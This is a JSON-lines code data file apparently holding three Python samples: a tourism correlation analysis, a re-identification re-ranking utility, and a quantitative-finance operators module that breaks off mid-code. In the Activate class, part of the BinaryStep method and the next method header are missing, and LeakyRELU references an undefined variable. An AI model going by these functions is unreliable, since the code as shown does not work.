+{"seq_id":"326221821","text":"# 스칼라 값으로 초기화 할때는 반드시 인덱스가 필요\nimport json\n\nimport math\nimport pandas as pd\nimport scipy.stats as ss\nimport matplotlib.pyplot as plt\n\ns1 = pd.Series(7, index=['a', 'b', 'c', 'd'])\nprint(s1)\n\n\n\n\n\n\nresultfile = '../__results__/crawling/서울특별시_tourspot_2017_2017.json'\nresultfiles = ['../__results__/crawling/일본(130)_foreignvisitor_2017_2017.json',\n '../__results__/crawling/미국(275)_foreignvisitor_2017_2017.json',\n '../__results__/crawling/중국(112)_foreignvisitor_2017_2017.json']\n\n# 아래는 상관계수의 구현 코드...(사용해 볼것!) 
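\n# For reference: the function below computes the sample Pearson correlation\n#   r = (n*Sxy - Sx*Sy) / sqrt((n*Sxx - Sx^2) * (n*Syy - Sy^2)),  with Sxy = sum(x*y), Sxx = sum(x^2), etc.\n# Quick cross-check (scipy.stats is already imported above as ss): ss.pearsonr(x, y)[0] should agree.\n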
#########################################################################\ndef correlation_coefficient(x, y):\n n = len(x)\n vals = range(n)\n\n x_sum = 0.0\n y_sum = 0.0\n x_sum_pow = 0.0\n y_sum_pow = 0.0\n mul_xy_sum = 0.0\n\n for i in vals:\n mul_xy_sum = mul_xy_sum + float(x[i]) * float(y[i])\n x_sum = x_sum + float(x[i])\n y_sum = y_sum + float(y[i])\n x_sum_pow = x_sum_pow + pow(float(x[i]), 2)\n y_sum_pow = y_sum_pow + pow(float(y[i]), 2)\n\n try:\n r = ((n * mul_xy_sum) - (x_sum * y_sum)) / \\\n math.sqrt(((n * x_sum_pow) - pow(x_sum, 2)) * ((n * y_sum_pow) - pow(y_sum, 2)))\n except ZeroDivisionError as e:\n r = 0.0\n\n return r\n########################################################################################################################\n\n# 투어리스트 스팟 테이블 작성 ##########################################################################################\nwith open(resultfile, 'r', encoding='utf-8') as infile:\n json_data = json.loads(infile.read())\n# print(json_data)\ntourspotvisitor_table = pd.DataFrame(json_data, columns=['date', 'tourist_spot','count_foreigner'])\nprint(tourspotvisitor_table)\n########################################################################################################################\n\n# 루프를 돌기위한 관광지 리스트 추출 ###################################################################################\ntourist_spot_list = tourspotvisitor_table['tourist_spot'].unique()\n########################################################################################################################\n\n# 외국인 방문객의 월별 카운트 테이블 작성 ##############################################################################\n# 외국인 방문객의 spot 별 조인된 테이블을 담기위한 리스트 : tables $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$\n\nforeignvisitor_table_list = []\nfor filename in resultfiles:\n with open(filename, 'r', encoding='utf-8') as infile:\n json_data = json.loads(infile.read())\n foreignvisitor_table = pd.DataFrame(json_data, columns=['date', 'country_name', 'visit_count']).sort_values('date').set_index('date')\n # foreignvisitor_table.rename(columns={'visit_count': '{0}'.format(foreignvisitor_table['country_name'].unique()[0])}, inplace=True)\n # del foreignvisitor_table[\"country_name\"]\n # print(foreignvisitor_table)\n foreignvisitor_table_list.append(foreignvisitor_table)\n # visit_count = foreignvisitor_table['visit_count'].get_values().tolist()\n########################################################################################################################\n\n# 각 관광지별 월별 방문객 테이블 루프 안에서 외국인 방문객 테이블을 각각 조인하여 시각화를 위한 전처리 수행 ############\n# 시각화를 위한 데이터의 전처리 ########################################################################################\nresultSetList = [] # 이곳에 시각화에 사용될 데이터셋을 담을 것!\n # 필요한 데이터는 장소명, 나라명, coefficient\n\nfor index, spot in enumerate(tourist_spot_list):\n temp_table = tourspotvisitor_table[tourspotvisitor_table['tourist_spot'] == spot].sort_values('date').set_index('date')\n\n resultSet = {'tour_spot' : spot}\n for foreignvisitor_table in foreignvisitor_table_list:\n merge_table = pd.merge(temp_table, foreignvisitor_table, left_index=True, right_index=True)\n print(merge_table)\n\n# 상관계수에 필요한 데이터 추출 - 리스트로...###########################################################################\n count_foreigner = list(merge_table['count_foreigner'])\n visit_count = list(merge_table['visit_count'])\n########################################################################################################################\n# 데이터 결과를 그래프로 나타내기 위해 필요한 나라이름, 
correlation coefficient 추출 ###################################\n r = correlation_coefficient(count_foreigner, visit_count)\n country_name = merge_table['country_name'].unique()[0]\n########################################################################################################################\n print(spot, country_name, r)\n\n# 결과를 딕셔너리에 업데이트 후 최종 리스트에 추가\n resultSet.update({'r_{0}'.format(country_name) : r})\n resultSetList.append(resultSet)\n\nprint(resultSetList)\n# return resultSetList\n\n\ndef graph_ex_last(result_analysis):\n graph_table = pd.DataFrame(result_analysis, columns=['tour_spot', 'r_중국', 'r_일본', 'r_미국'])\n graph_table = graph_table.set_index('tour_spot')\n\n graph_table.plot(kind='bar')\n plt.show()\n\ngraph_ex_last(resultSetList)","sub_path":"__test__/test_my.py","file_name":"test_my.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"104788296","text":"import numpy as np\r\nimport copy\r\ndef graph_reasoning(dist_p_g, dist_g_g, lambda_rgb=0.01, topk=9):\r\n #similarity graph reasoning\r\n dist_p_g = copy.deepcopy(dist_p_g)\r\n dist_g_g = copy.deepcopy(lambda_rgb* dist_g_g)\r\n gi_neibor_index = np.argsort(dist_g_g)[:,:20]\r\n for j in range(dist_p_g.shape[1]):\r\n\r\n dist_p_k = dist_p_g[:,gi_neibor_index[j]] + dist_g_g[j, gi_neibor_index[j]]\r\n dist_p_gj = np.sort(dist_p_k, axis=1)[:,:topk].mean(axis=1)\r\n dist_p_g[:,j] = dist_p_gj\r\n\r\n\r\n return dist_p_g\r\n\r\ndef re_ranking(q_g_dist, g_g_dist, k0=12, k1=20, k2=6, lambda_value=0.3):\r\n\r\n original_dist = np.concatenate([q_g_dist.T, g_g_dist], axis=1)\r\n original_dist = np.power(original_dist, 2).astype(np.float32)\r\n original_dist = np.transpose(1. * original_dist/np.max(original_dist,axis = 0))\r\n\r\n query_num = q_g_dist.shape[0]\r\n gallery_num = q_g_dist.shape[1]\r\n all_num = q_g_dist.shape[0] + q_g_dist.shape[1]\r\n \r\n q_g_dist = original_dist[:query_num,]\r\n g_g_dist = original_dist[query_num:,]\r\n\r\n V_q = np.zeros_like(q_g_dist).astype(np.float32)\r\n initial_rank_q = np.argsort(q_g_dist).astype(np.int32)\r\n\r\n V_g = np.zeros_like(g_g_dist).astype(np.float32)\r\n initial_rank_g = np.argsort(g_g_dist).astype(np.int32) \r\n\r\n\r\n ##q g similarity matrix\r\n for i in range(query_num):\r\n # k-reciprocal neighbors\r\n forward_k_neigh_index = initial_rank_q[i,:k0+1]\r\n k_reciprocal_expansion_index = forward_k_neigh_index\r\n\r\n k_reciprocal_expansion_index = np.unique(k_reciprocal_expansion_index)\r\n weight = np.exp(-q_g_dist[i,k_reciprocal_expansion_index])\r\n V_q[i,k_reciprocal_expansion_index] = 1.*weight/np.sum(weight) \r\n\r\n\r\n # g g similarity matrix\r\n for i in range(gallery_num):\r\n # k-reciprocal neighbors\r\n forward_k_neigh_index = initial_rank_g[i,:k1+1]\r\n backward_k_neigh_index = initial_rank_g[forward_k_neigh_index,:k1+1]\r\n fi = np.where(backward_k_neigh_index==i)[0]\r\n k_reciprocal_index = forward_k_neigh_index[fi]\r\n # import pdb;pdb.set_trace()\r\n k_reciprocal_expansion_index = k_reciprocal_index\r\n for j in range(len(k_reciprocal_index)):\r\n candidate = k_reciprocal_index[j]\r\n candidate_forward_k_neigh_index = initial_rank_g[candidate,:int(np.around(k1/2.))+1]\r\n candidate_backward_k_neigh_index = initial_rank_g[candidate_forward_k_neigh_index,:int(np.around(k1/2.))+1]\r\n fi_candidate = np.where(candidate_backward_k_neigh_index == candidate)[0]\r\n candidate_k_reciprocal_index = candidate_forward_k_neigh_index[fi_candidate]\r\n if 
len(np.intersect1d(candidate_k_reciprocal_index,k_reciprocal_index))> 2./3*len(candidate_k_reciprocal_index):\r\n k_reciprocal_expansion_index = np.append(k_reciprocal_expansion_index,candidate_k_reciprocal_index)\r\n\r\n k_reciprocal_expansion_index = np.unique(k_reciprocal_expansion_index)\r\n weight = np.exp(-g_g_dist[i,k_reciprocal_expansion_index])\r\n V_g[i,k_reciprocal_expansion_index] = 1.*weight/np.sum(weight)\r\n\r\n \r\n V = np.concatenate([V_q,V_g], axis=0)\r\n V = np.concatenate([np.zeros((all_num, query_num)),V], axis=1)\r\n initial_rank = np.concatenate([initial_rank_q, initial_rank_g], axis=0)\r\n \r\n original_dist = np.concatenate([np.zeros((query_num, query_num)), q_g_dist], axis=1)\r\n\r\n del initial_rank\r\n invIndex = []\r\n for i in range(all_num):\r\n invIndex.append(np.where(V[:,i] != 0)[0]) # row indx\r\n\r\n jaccard_dist = np.zeros_like(original_dist,dtype = np.float32)\r\n\r\n\r\n for i in range(query_num):\r\n temp_min = np.zeros(shape=[1,all_num],dtype=np.float32)\r\n indNonZero = np.where(V[i,:] != 0)[0] #col indx\r\n indImages = []\r\n indImages = [invIndex[ind] for ind in indNonZero]\r\n for j in range(len(indNonZero)):\r\n temp_min[0,indImages[j]] = temp_min[0,indImages[j]]+ np.minimum(V[i,indNonZero[j]],V[indImages[j],indNonZero[j]])\r\n jaccard_dist[i] = 1-temp_min/(2.-temp_min)\r\n\r\n final_dist = jaccard_dist*(1-lambda_value) + original_dist*lambda_value\r\n del original_dist\r\n del V\r\n del jaccard_dist\r\n final_dist = final_dist[:query_num,query_num:]\r\n return final_dist","sub_path":"utils/relevancemetric.py","file_name":"relevancemetric.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491553905","text":"import os\r\nimport re\r\nimport time\r\nimport numpy as np\r\nimport numpy.ma as npma\r\nimport math as m\r\nimport pandas as pd\r\nimport seaborn as sns\r\nimport datetime as dt\r\nimport random as rdn\r\nimport matplotlib.pyplot as plt\r\nimport scipy\r\nplt.style.use('ggplot')\r\nfrom pandas.plotting import register_matplotlib_converters\r\nregister_matplotlib_converters()\r\n\r\nclass DrawPlotByTS():\r\n def __init__(self):\r\n print('Initializing DrawPlotByTS...')\r\n print('Sucessfully Initializing DrawPlotByTS')\r\n \r\n def PlotLogPicture(self,dfname,period,*input_return): #list,single_df\r\n fig = plt.figure(figsize=(15,3))\r\n plt.title(\"price\")\r\n plt.yscale(\"log\")\r\n col_labels=['return','std','sharpe','max_drawdown']\r\n row_labels=dfname\r\n table_vals=[]\r\n input_len=len(input_return)\r\n time=input_return[0].index\r\n for i,single in enumerate(input_return):\r\n cumulate=single.cumprod()\r\n drawdown=self.CalculateDrawdown(cumulate)\r\n [a,b,c,d]=self.CalculateBasicInformation(cumulate,single,period)[0:4]\r\n table_vals.append([a,b,c,d])\r\n plt.plot(time,cumulate,label=dfname[i])\r\n plt.legend()\r\n plt.table(cellText=table_vals,rowLabels=row_labels,colLabels=col_labels,loc='lower right',colWidths = [0.15]*4)\r\n plt.show()\r\n \r\n def PlotDrawdown(self,dfname,*cumulate): #list,cumulate_df\r\n input_len=len(cumulate)\r\n time=cumulate[0].index\r\n drawdown_combine=[]\r\n for i,cumulate_each in enumerate(cumulate):\r\n plt.figure(figsize=(15,3))\r\n plt.title(dfname[i])\r\n drawdown_combine.append(self.CalculateDrawdown(cumulate_each))\r\n plt.fill_between(time,0,drawdown_combine[-1],facecolor='red')\r\n plt.ylim(top = 0, bottom = -0.6)\r\n plt.show()\r\n if len(cumulate)==2:\r\n plt.figure(figsize=(15,3))\r\n 
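# overlay: drawdown_temp (built below) keeps the pointwise shallower of the two drawdown curves, so the red fill only shows where the second series draws down deeper than the first\r\n            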
plt.title(\"combine_drawdown\")\r\n drawdown_temp=[]\r\n for i in range(len(drawdown_combine[0])):\r\n if drawdown_combine[0][i]>=drawdown_combine[1][i]:\r\n drawdown_temp.append(drawdown_combine[0][i])\r\n else:\r\n drawdown_temp.append(drawdown_combine[1][i])\r\n plt.fill_between(time,0,drawdown_combine[0],facecolor='blue',label=dfname[0])\r\n plt.fill_between(time,drawdown_temp,drawdown_combine[1],facecolor='red',label=dfname[1])\r\n plt.ylim(top = 0, bottom = -0.6)\r\n plt.legend(loc='lower right')\r\n plt.show()\r\n def CalculateDrawdown(self,price):\r\n drawdown=0\r\n x=1\r\n for i in range(1,len(price)):\r\n if price.iloc[i]>x:\r\n x=price.iloc[i]\r\n drawdown=np.append(drawdown,-(1-price.iloc[i]/x))\r\n return drawdown\r\n \r\n def TwoDigitsPercent(self,input_float):\r\n return ('%s'% (np.round(100*input_float,2))+'%')\r\n \r\n def TwoDigits(self,input_float):\r\n return ('%s'% (np.round(input_float,2)))\r\n \r\n def CalculateBasicInformation(self,price,ret,data_period):\r\n data_period=float(data_period)\r\n print(price.iloc[-1],data_period,price.shape[0])\r\n exp_return=(price.iloc[-1]**(data_period/price.shape[0])-1.0) #imply that price[0]=1\r\n std=ret.std()*m.sqrt(data_period)\r\n sharpe=exp_return/std\r\n max_drawdown=pd.DataFrame(self.CalculateDrawdown(price)).min().iloc[0]\r\n return_dd_ratio = -exp_return/max_drawdown\r\n outputs = [exp_return,std,sharpe,max_drawdown,return_dd_ratio]\r\n outputs_str = []\r\n for o in outputs:\r\n if o<1:\r\n outputs_str.append(self.TwoDigitsPercent(o))\r\n else:\r\n outputs_str.append(self.TwoDigits(o))\r\n return outputs_str\r\n\r\n def CalculateBasicInformationFast(self,price,ret,data_period):\r\n data_period=float(data_period)\r\n #print(price.iloc[-1],data_period,price.shape[0])\r\n exp_return=(price.iloc[-1]**(data_period/price.shape[0])-1.0) #imply that price[0]=1\r\n std=ret.std()*m.sqrt(data_period)\r\n sharpe=exp_return/std\r\n max_drawdown=pd.DataFrame(self.CalculateDrawdown(price)).min().iloc[0]\r\n return_dd_ratio = -exp_return/max_drawdown\r\n outputs = [exp_return,std,sharpe,max_drawdown,return_dd_ratio]\r\n return outputs\r\n\r\nclass Activate():\r\n def BinaryStep(self,df,interval,unact_value=0,include_bound=True):\r\n threshold_low,threshold_up = interval[0],interval[1]\r\n if include_bound == True:\r\n res = np.where((df>=threshold_low)&(df<=threshold_up),1,unact_value)\r\n else:\r\n res = np.where((df>threshold_low)&(dfthreshold,df,0)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def LeakyRELU(self,df,threshold,slope):\r\n res = np.where(df>threshold,df,coef*df)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Softmax(self,df):\r\n df_exp = np.exp(df)\r\n exp_sum = np.sum(df_exp,axis=1)\r\n df_exp_sum = np.tile(exp_sum,reps=(len(df.columns),1)).T\r\n res = df_exp/df_exp_sum\r\n return res\r\n\r\n def Swish(self,df,threshold):\r\n res = df/(1 + np.exp(-df))\r\n return res\r\n\r\nclass Operators(Activate):\r\n def __init__(self):\r\n print('Initializing Operator...')\r\n print('Successfuly Initializing Operator')\r\n\r\n def GetDFShell(self,df,value=0):\r\n res = np.full_like(df,value)\r\n res = pd.DataFrame(res,index = df.index,columns=df.columns)\r\n return res\r\n \r\n def TransDFtoNP(self,matrix):\r\n res = matrix.copy()\r\n if type(matrix) == pd.DataFrame:\r\n res = matrix.values\r\n return res\r\n \r\n def TransNPtoOriDF(self,np_array,ori_matrix):\r\n res = np_array.copy()\r\n if type(ori_matrix) == pd.DataFrame:\r\n res = 
pd.DataFrame(res,index=ori_matrix.index,columns=ori_matrix.columns)\r\n return res\r\n \r\n def FillRowN(self,df,fill_in_content,row_number):\r\n res,fill_array = self.TransDFtoNP(df),self.TransDFtoNP(fill_in_content)\r\n res[row_number,:] = fill_array[row_number,:]\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n \r\n def FwdChangeRate(self,df,period=1):\r\n df_next = df.shift(-period)\r\n return df_next/df - 1\r\n \r\n def BwdChangeRate(self,df,period=1):\r\n df_last = df.shift(period)\r\n return df/df_last - 1\r\n \r\n def FwdChangeNumber(self,df,period=1):\r\n df_next = df.shift(-period)\r\n return df_next - df\r\n \r\n def BwdChangeNumber(self,df,period=1):\r\n df_last = df.shift(period)\r\n return df - df_last\r\n\r\n def GetSegList(self,segment_np):\r\n s_list = []\r\n for s in (segment_np[[0,-1],:].flatten()):\r\n if s==s and s not in s_list:\r\n s_list.append(s)\r\n return s_list\r\n\r\n def SegFirmsCount(self,segment_df):\r\n segment_np = segment_df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(segment_df,0)\r\n print(len(seglist))\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,1,0)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,segment_df)\r\n seg_num = self.Extend1DTSto2D(np.sum(seg_boolin,axis=1),seg_boolin)\r\n seg_num_masked = np.where(segment_np==seg,seg_num,0)\r\n res += seg_num_masked\r\n res = self.TransNPtoOriDF(res,segment_df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegSum(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,0)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_sum = self.Extend1DTSto2D(np.sum(seg_boolin,axis=1),seg_boolin)\r\n seg_sum_masked = np.where(segment_np==seg,seg_sum,0)\r\n res += seg_sum_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegMean(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_mean = pd.DataFrame(np.nanmean(seg_boolin,axis=1),index=seg_boolin.index)\r\n seg_mean = self.Extend1DTSto2D(seg_mean,seg_boolin) \r\n seg_mean_masked = np.where(segment_np==seg,seg_mean,0)\r\n res += seg_mean_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegRank(self,df,segment_df,max_has_maxrank=False):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n print(len(seglist))\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_rank = self.Rank(seg_boolin,max_has_maxrank=max_has_maxrank)\r\n seg_rank_masked = np.where(segment_np==seg,seg_rank,0)\r\n res += seg_rank_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def SegSubByRankNData(self,df,segment_df,ranked_segment_df,n=1):\r\n np_array,segment_np,segment_rank_np = df.values,segment_df.values,ranked_segment_df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for i in range(df.shape[0]):\r\n for j1 in 
range(df.shape[1]):\r\n if segment_rank_np[i,j1] == 1:\r\n for j2 in range(df.shape[1]):\r\n if segment_np[i,j1] == segment_np[i,j2]:\r\n res[i,j2] = np_array[i,j1]\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n\r\n def SegZscore(self,df,segment_df):\r\n segment_np,np_array = segment_df.values,df.values\r\n seglist = self.GetSegList(segment_np)\r\n res = np.full_like(df,0)\r\n for seg in seglist:\r\n seg_boolin = np.where(segment_np==seg,np_array,np.nan)\r\n seg_boolin = self.TransNPtoOriDF(seg_boolin,df)\r\n seg_rank = self.RowZscore(seg_boolin)\r\n seg_rank_masked = np.where(segment_np==seg,seg_rank,0)\r\n res += seg_rank_masked\r\n res = self.TransNPtoOriDF(res,df)\r\n res = res.where(segment_df==segment_df)\r\n return res\r\n\r\n def MovingAverage(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np_array.copy()\r\n for i in range(1,period):\r\n x = np.roll(np_array,i,axis=0)\r\n res += x\r\n res = res/period\r\n try:\r\n res[:period-1,:] = np.nan\r\n except:\r\n res[:period-1] = np.nan\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ExpMovingAverage(self,df,alpha): #EMAt = alpha*(today)+(1-alpha)*(EMAt-1)\r\n np_array = self.TransDFtoNP(df)\r\n res = np_array.copy()\r\n for i in range(1,len(np_array)):\r\n temp = res[i-1,:].copy()\r\n temp2 = np.where(temp==temp,temp,0)\r\n res[i,:] = (1-alpha)*temp2 + alpha*np_array[i,:]\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def RowMean(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n row_mean = np.nanmean(np_array,axis=1)\r\n row_mean = pd.DataFrame(row_mean,index=df.index)\r\n res = self.Extend1DTSto2D(row_mean,df)\r\n return res\r\n\r\n def RowStd(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n row_std = np.nanstd(np_array,axis=1)\r\n row_std = pd.DataFrame(row_std,index=df.index)\r\n res = self.Extend1DTSto2D(row_std,df)\r\n return res\r\n\r\n def RowZscore(self,df):\r\n row_mean = self.RowMean(df)\r\n row_std = self.RowStd(df)\r\n res = (df - row_mean)/row_std\r\n return res\r\n\r\n def ColumnStack(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(len(np_array)):\r\n temp = np.nansum(np_array[:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnRSV(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = (np_array[i,:]-np.min(np_array[i-period+1:i+1,:],axis=0))/(np.max(np_array[i-period+1:i+1,:],axis=0)-np.min(np_array[i-period+1:i+1,:],axis=0))\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnSum(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.sum(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnMean(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.mean(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnStd(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = 
np.std(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnZscore(self,df,period):\r\n res = (df-self.ColumnMean(df,period))/self.ColumnStd(df,period)\r\n return res\r\n\r\n def ColumnCorr(self,df,col_list):\r\n corr_matrix=df[col_list].corr()\r\n return corr_matrix\r\n\r\n def ColumnCorrDesc(self,df):\r\n res = self.ColumnCorrAsc(df)\r\n res.reverse()\r\n return res\r\n\r\n def ColumnCorrAsc(self,df):\r\n corr_matrix = self.ColumnCorr(df,list(df.columns)).values\r\n firms = df.columns\r\n res = []\r\n for i in range(1,len(df.columns)):\r\n for j in range(0,i):\r\n if corr_matrix[i,j] == corr_matrix[i,j]:\r\n d,f = firms[i],firms[j]\r\n res.append([(d,f),np.round(corr_matrix[i,j],4)])\r\n res.sort(key=lambda x: x[1])\r\n return res\r\n\r\n def ColumnMax(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.max(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def ColumnMin(self,df,period):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.min(np_array[i-period+1:i+1,:],axis=0)\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def NDayCorrOfTwoArray(self,df1,df2,period): #shape of df1,df2 must be the same\r\n np1,np2 = self.TransDFtoNP(df1),self.TransDFtoNP(df2)\r\n res = np.full_like(np1,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np1)):\r\n for j in range(len(np1[i])):\r\n temp = np.corrcoef(np1[i-period+1:i+1,j],np2[i-period+1:i+1,j])[1,0]\r\n res[i,j] = temp\r\n res = self.TransNPtoOriDF(res,df1)\r\n return res\r\n\r\n def Compound(self,df,plus_one=False):\r\n cal_df = df.copy()\r\n if plus_one == True:\r\n cal_df += 1\r\n cal_df = cal_df.fillna(1)\r\n res = cal_df.copy()\r\n for i in range(1,len(df)):\r\n temp = cal_df.shift(i).fillna(1)\r\n res *= temp\r\n return res\r\n \r\n def DisCompound(self,df,minus_one=False):\r\n cal_df = df.copy()\r\n cal_last = cal_df.shift(1)\r\n res = cal_df/cal_last\r\n res = res.fillna(1)\r\n if minus_one == True:\r\n res -= 1\r\n return res\r\n \r\n def NDayRetBwd(self,df,period,plus_one=1):\r\n np_array = self.TransDFtoNP(df)+plus_one\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.prod(np_array[i-period+1:i+1,:],axis=0)-plus_one\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def NDayRetFwd(self,df,period,plus_one=1):\r\n np_array = self.TransDFtoNP(df)+plus_one\r\n res = np.full_like(np_array,np.nan,dtype=np.float)\r\n for i in range(period-1,len(np_array)):\r\n temp = np.prod(np_array[i:i+period,:],axis=0)-plus_one\r\n res[i,:] = temp\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Sign(self,df):\r\n np_array = self.TransDFtoNP(df)\r\n res = np.sign(np_array)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def SignStreak(self,df,zero_continue=True):\r\n array = self.TransDFtoNP(df)\r\n res = np.full_like(array,np.nan)\r\n res[0,:] = np.sign(array[0,:])\r\n for j in range(len(array[0])):\r\n for i in range(1,len(array)):\r\n last_sign = np.sign(res[i-1,j])\r\n if array[i,j]*last_sign > 0:\r\n res[i,j] = last_sign*(1+abs(res[i-1,j]))\r\n elif array[i,j]*last_sign < 0:\r\n res[i,j] = -last_sign\r\n elif array[i,j]*last_sign == 0:\r\n if 
zero_continue == True:\r\n res[i,j] = res[i-1,j]\r\n else:\r\n res[i,j] = np.sign(array[i,j])\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n \r\n def Rank(self,df,max_has_maxrank=False):\r\n res = df.rank(axis=1,method='average',ascending=max_has_maxrank)\r\n return res\r\n\r\n def PR(self,df,max_has_maxrank=True):\r\n rank = self.Rank(df,max_has_maxrank=max_has_maxrank)\r\n row_max = rank.max(axis=1)\r\n div = self.Extend1DTSto2D(row_max,rank)\r\n res = 100*rank/div\r\n return res\r\n\r\n def LinearCombination(self,weight_list,df_list):\r\n linear_combination = 0\r\n for i in range(0,len(df_list)):\r\n linear_combination += weight_list[i]*df_list[i]\r\n return linear_combination\r\n \r\n def Perceptron(self,weight_list,df_list,activate_func,params_for_actfunc):\r\n lc = self.LinearCombination(weight_list,df_list)\r\n params_for_actfunc['df']=lc\r\n res = getattr(self,activate_func)(**params_for_actfunc)\r\n return res\r\n\r\n def StringEqual(self,df,analog_str_list): # df = str in str_list? 1,0\r\n res = np.full_like(df,0)\r\n for a_str in analog_str_list:\r\n res += np.where(df==a_str,1,0)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def StringElimination(self,df,analog_str_list): # df = str in str_list? 0,1\r\n res = np.full_like(df,1,dtype=int)\r\n for a_str in analog_str_list:\r\n res *= np.where(df==a_str,0,1)\r\n res = self.TransNPtoOriDF(res,df)\r\n return res\r\n\r\n def Extend1DTSto2D(self,df_1d,target_df):\r\n index1 = df_1d.index\r\n index2 = target_df.index\r\n missing_dates = index2.difference(index1)\r\n res = df_1d.T\r\n if len(missing_dates) > 0:\r\n res[missing_dates] = pd.DataFrame([[np.nan for i in range(len(missing_dates))]])\r\n res = res[index2].values.flatten()\r\n result = np.tile(res,(target_df.shape[1],1)).T\r\n result_df = self.TransNPtoOriDF(result,target_df)\r\n return result_df\r\n\r\n def Extend1DCSto2D(self,df_1d,target_df):\r\n col1 = df_1d.columns\r\n col2 = target_df.columns\r\n missing_firms = col2.difference(col1)\r\n res = df_1d\r\n if len(missing_firms) > 0:\r\n res[missing_firms] = pd.DataFrame([[np.nan for i in range(len(missing_firms))]])\r\n res = res[col2].values.flatten()\r\n result = np.tile(res,(target_df.shape[0],1))\r\n result_df = self.TransNPtoOriDF(result,target_df)\r\n return result_df\r\n\r\n def MissingColumns(self,ori_df,target_df):\r\n correct_columns = pd.Index(target_df.columns)\r\n input_columns = pd.Index(ori_df.columns)\r\n return list(correct_columns.difference(input_columns))\r\n\r\n def TrimColumns(self,ori_df,target_df):\r\n lack_tickers = self.MissingColumns(ori_df,target_df)\r\n for t in lack_tickers:\r\n ori_df.insert(0,t,np.nan)\r\n res = ori_df[target_df.columns]\r\n return res\r\n\r\n def TrimDF(self,ori_df,target_df): #columns must be the same,index must be timestamp or datetime\r\n ori_index,ori_col = 